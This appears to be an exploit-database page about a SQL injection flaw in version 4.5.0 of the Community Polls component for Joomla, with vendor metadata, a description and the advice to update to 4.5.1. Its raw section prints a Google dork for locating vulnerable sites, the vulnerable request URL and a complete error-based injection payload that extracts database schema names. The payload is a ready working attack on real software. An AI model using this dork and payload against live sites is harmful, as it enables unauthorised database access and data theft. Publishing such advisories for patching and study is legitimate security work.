Joomla! Component Community Polls v4.5.0 - SQL Injection

vendor:

Community Polls

by:

Ihsan Sencan

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Community Polls

Affected Version From: 4.5.0

Affected Version To: 4.5.0

Patch Exists: YES

Related CWE: N/A

CPE: a:corejoomla:community_polls:4.5.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7 x64, Kali Linux x64

2017

Joomla! Component Community Polls v4.5.0 – SQL Injection

The vulnerability exists due to insufficient filtration of user-supplied input in the 'list_filter' and 'catid[]' parameters of the 'index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to disclose sensitive information, modify data, delete data and compromise vulnerable system.

Mitigation:

Update to version 4.5.1 or later.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitypolls
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/
# Demo: http://demo.corejoomla.com/polls.html
# Version: 4.5.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitypolls&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #